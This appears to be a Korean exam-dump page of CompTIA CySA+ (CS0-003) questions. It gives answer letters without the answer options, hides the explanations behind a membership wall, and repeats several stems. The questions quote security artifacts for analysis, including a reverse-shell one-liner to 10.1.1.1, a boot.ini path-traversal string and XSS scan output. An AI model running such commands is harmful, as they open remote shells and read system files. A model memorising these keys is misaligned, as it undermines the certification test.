최신 CS0-003 무료덤프 - CompTIA Cybersecurity Analyst (CySA+) Certification
A cloud team received an alert that unauthorized resources were being auto-provisioned. After investigating, the team suspects that crypto mining is occurring. Which of the following indicators would most likely lead the team to this conclusion?
.
.
정답: C
설명: (DumpTOP 회원만 볼 수 있음)
Which of the following best describes the key elements of a successful information security program?
정답: B
설명: (DumpTOP 회원만 볼 수 있음)
During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related to its volatility level?
정답: B
설명: (DumpTOP 회원만 볼 수 있음)
A company's user accounts have been compromised. Users are also reporting that the company's internal portal is sometimes only accessible through HTTP, other times; it is accessible through HTTPS. Which of the following most likely describes the observed activity?
정답: C
설명: (DumpTOP 회원만 볼 수 있음)
Which of the following is most appropriate to use with SOAR when the security team would like to automate actions across different vendor platforms?
정답: B
설명: (DumpTOP 회원만 볼 수 있음)
A virtual web server in a server pool was infected with malware after an analyst used the internet to research a system issue. After the server was rebuilt and added back into the server pool, users reported issues with the website, indicating the site could not be trusted. Which of the following is the most likely cause of the server issue?
정답: C
설명: (DumpTOP 회원만 볼 수 있음)
A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The proxy is sitting in a rack and is not being used, as the company has replaced it with a new one. The CVE score of the vulnerability on the proxy is a 9.8. Which of the following best practices should the company follow with this proxy?
정답: A
설명: (DumpTOP 회원만 볼 수 있음)
An analyst is conducting monitoring against an authorized team that win perform adversarial techniques. The analyst interacts with the team twice per day to set the stage for the techniques to be used. Which of the following teams is the analyst a member of?
정답: C
설명: (DumpTOP 회원만 볼 수 있음)
A company recently experienced a security incident. The security team has determined a user clicked on a link embedded in a phishing email that was sent to the entire company. The link resulted in a malware download, which was subsequently installed and run.
INSTRUCTIONS
Part 1
Review the artifacts associated with the security incident. Identify the name of the malware, the malicious IP address, and the date and time when the malware executable entered the organization.
Part 2
Review the kill chain items and select an appropriate control for each that would improve the security posture of the organization and would have helped to prevent this incident from occurring. Each control may only be used once, and not all controls will be used.
Firewall log:
File integrity Monitoring Report:
Malware domain list:
Vulnerability Scan Report:
Phishing Email:
INSTRUCTIONS
Part 1
Review the artifacts associated with the security incident. Identify the name of the malware, the malicious IP address, and the date and time when the malware executable entered the organization.
Part 2
Review the kill chain items and select an appropriate control for each that would improve the security posture of the organization and would have helped to prevent this incident from occurring. Each control may only be used once, and not all controls will be used.
Firewall log:
File integrity Monitoring Report:
Malware domain list:
Vulnerability Scan Report:
Phishing Email:
정답:
An incident response analyst is taking over an investigation from another analyst. The investigation has been going on for the past few days. Which of the following steps is most important during the transition between the two analysts?
정답: C
설명: (DumpTOP 회원만 볼 수 있음)
A security analyst reviews the following Arachni scan results for a web application that stores PII data:
Which of the following should be remediated first?
Which of the following should be remediated first?
정답: C
설명: (DumpTOP 회원만 볼 수 있음)
A security analyst is conducting a vulnerability assessment of a company's online store. The analyst discovers a critical vulnerability in the payment processing system that could be exploited, allowing attackers to steal customer payment information. Which of the following should the analyst do next?
정답: A
설명: (DumpTOP 회원만 볼 수 있음)
While reviewing the web server logs a security analyst notices the following snippet
..\../..\../boot.ini
Which of the following is being attempted?
..\../..\../boot.ini
Which of the following is being attempted?
정답: A
설명: (DumpTOP 회원만 볼 수 있음)
An analyst receives an alert for suspicious IIS log activity and reviews the following entries:
2024-05-23 15:57:05 10.203.10.16 HEAT / - 80 - 10.203.10.17 DirBuster-1.0-RC1+(http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project)
...
Which of the following will the analyst infer from the logs?
2024-05-23 15:57:05 10.203.10.16 HEAT / - 80 - 10.203.10.17 DirBuster-1.0-RC1+(http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project)
...
Which of the following will the analyst infer from the logs?
정답: B
설명: (DumpTOP 회원만 볼 수 있음)
A security analyst must assist the IT department with creating a phased plan for vulnerability patching that meets established SLAs.
Which of the following vulnerability management elements will best assist with prioritizing a successful plan?
Which of the following vulnerability management elements will best assist with prioritizing a successful plan?
정답: A
설명: (DumpTOP 회원만 볼 수 있음)
A security analyst detects an exploit attempt containing the following command:
sh -i >& /dev/udp/10.1.1.1/4821 0>$l
Which of the following is being attempted?
sh -i >& /dev/udp/10.1.1.1/4821 0>$l
Which of the following is being attempted?
정답: B
설명: (DumpTOP 회원만 볼 수 있음)
A security analyst recently used Arachni to perform a vulnerability assessment of a newly developed web application. The analyst is concerned about the following output:
[+] XSS: In form input 'txtSearch' with action https://localhost/search.aspx
[-] XSS: Analyzing response #1...
[-] XSS: Analyzing response #2...
[-] XSS: Analyzing response #3...
[+] XSS: Response is tainted. Looking for proof of the vulnerability.
Which of the following is the most likely reason for this vulnerability?
[+] XSS: In form input 'txtSearch' with action https://localhost/search.aspx
[-] XSS: Analyzing response #1...
[-] XSS: Analyzing response #2...
[-] XSS: Analyzing response #3...
[+] XSS: Response is tainted. Looking for proof of the vulnerability.
Which of the following is the most likely reason for this vulnerability?
정답: A
설명: (DumpTOP 회원만 볼 수 있음)
A SOC analyst is analyzing traffic on a network and notices an unauthorized scan. Which of the following types of activities is being observed?
정답: C